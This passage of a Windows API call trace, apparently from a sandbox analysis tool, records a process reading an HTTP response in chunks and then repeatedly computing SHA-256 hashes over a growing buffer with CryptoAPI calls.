	[0252.719] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x4e8) returned 1
	[0252.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4f0) returned 0x26d4600
	[0252.719] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x26d4600, dwNumberOfBytesToRead=0x4e8, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x26d4600*, lpdwNumberOfBytesRead=0x1283bc*=0x4e8) returned 1
	[0252.719] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.720] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x26d4600, Size=0x24f0) returned 0x2774fb0
	[0252.720] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2775498, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2775498*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.720] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x1a74) returned 1
	[0252.720] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2774fb0, Size=0x3f60) returned 0x274a0b8
	[0252.720] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x274c5a0, dwNumberOfBytesToRead=0x1a74, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x274c5a0*, lpdwNumberOfBytesRead=0x1283bc*=0x1a74) returned 1
	[0252.720] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.846] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x274a0b8, Size=0x5f60) returned 0x27fdb30
	[0252.846] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2801a8c, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2801a8c*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.846] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.847] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27fdb30, Size=0x7f60) returned 0x2873ea0
	[0252.847] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2879dfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2879dfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.847] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.847] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0x9f60) returned 0x2873ea0
	[0252.847] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x287bdfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x287bdfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.848] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.848] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0xbf60) returned 0x2873ea0
	[0252.848] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x287ddfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x287ddfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.848] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.931] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0xdf60) returned 0x2873ea0
	[0252.931] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x287fdfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x287fdfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.931] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0252.931] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0xff60) returned 0x2873ea0
	[0252.931] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2881dfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2881dfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0252.931] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0253.069] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0x11f60) returned 0x2873ea0
	[0253.069] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2883dfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2883dfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0253.069] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x2000) returned 1
	[0253.069] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0x13f60) returned 0x2873ea0
	[0253.069] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2885dfc, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2885dfc*, lpdwNumberOfBytesRead=0x1283bc*=0x2000) returned 1
	[0253.070] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0xe54) returned 1
	[0253.070] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873ea0, Size=0x14db0) returned 0x2873ea0
	[0253.070] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x2887dfc, dwNumberOfBytesToRead=0xe54, lpdwNumberOfBytesRead=0x1283bc | out: lpBuffer=0x2887dfc*, lpdwNumberOfBytesRead=0x1283bc*=0xe54) returned 1
	[0253.070] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x1283c4 | out: lpdwNumberOfBytesAvailable=0x1283c4*=0x0) returned 1
	[0253.071] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0253.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x276ecb0
	[0253.071] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.072] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.072] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0253.072] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfdd8
	[0253.072] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27bfdd8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bfdd8, pdwDataLen=0x128c3c) returned 1
	[0253.072] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.072] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.072] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.073] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.073] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0253.073] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0300
	[0253.073] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c0300, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0300, pdwDataLen=0x128c3c) returned 1
	[0253.073] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.073] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.073] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.074] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.074] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0253.074] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0378
	[0253.074] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0378, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0378, pdwDataLen=0x128c3c) returned 1
	[0253.074] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.074] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.074] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.075] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.075] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0253.075] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0080
	[0253.075] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c0080, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0080, pdwDataLen=0x128c3c) returned 1
	[0253.075] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.075] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.075] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.076] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.076] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0253.076] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2858
	[0253.076] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2858, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2858, pdwDataLen=0x128c3c) returned 1
	[0253.077] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.077] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.077] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.077] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.077] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0253.077] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c28d0
	[0253.077] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c28d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c28d0, pdwDataLen=0x128c3c) returned 1
	[0253.077] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.078] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.078] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.078] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.078] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0253.078] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c03f0
	[0253.078] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c03f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c03f0, pdwDataLen=0x128c3c) returned 1
	[0253.078] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.078] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.078] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.079] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.079] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0253.079] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00d0
	[0253.079] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c00d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c00d0, pdwDataLen=0x128c3c) returned 1
	[0253.079] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.079] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.079] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.080] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.080] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0253.080] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0058
	[0253.080] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0058, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0058, pdwDataLen=0x128c3c) returned 1
	[0253.080] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.080] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.080] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.081] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.081] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0253.081] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0328
	[0253.081] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c0328, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0328, pdwDataLen=0x128c3c) returned 1
	[0253.081] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.081] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.081] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.081] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.081] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0253.081] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c04b8
	[0253.082] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c04b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c04b8, pdwDataLen=0x128c3c) returned 1
	[0253.082] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.082] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.082] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.082] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.082] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0253.082] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c04e0
	[0253.082] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c04e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c04e0, pdwDataLen=0x128c3c) returned 1
	[0253.082] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.082] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.082] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.083] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.083] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0253.083] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c08a0
	[0253.083] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c08a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c08a0, pdwDataLen=0x128c3c) returned 1
	[0253.083] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.083] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.083] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.084] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.084] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0253.084] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00f8
	[0253.084] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c00f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c00f8, pdwDataLen=0x128c3c) returned 1
	[0253.084] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.084] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.084] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.084] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.084] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0253.084] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0170
	[0253.084] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0170, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0170, pdwDataLen=0x128c3c) returned 1
	[0253.084] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.084] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.084] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.085] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.085] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0253.085] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c01e8
	[0253.085] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c01e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c01e8, pdwDataLen=0x128c3c) returned 1
	[0253.085] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.085] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.085] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.086] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.086] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0253.086] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfba8
	[0253.086] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27bfba8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bfba8, pdwDataLen=0x128c3c) returned 1
	[0253.086] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.086] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.086] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.087] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.087] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0253.087] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9c8
	[0253.087] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf9c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bf9c8, pdwDataLen=0x128c3c) returned 1
	[0253.087] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.087] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.087] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.087] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.087] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0253.087] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
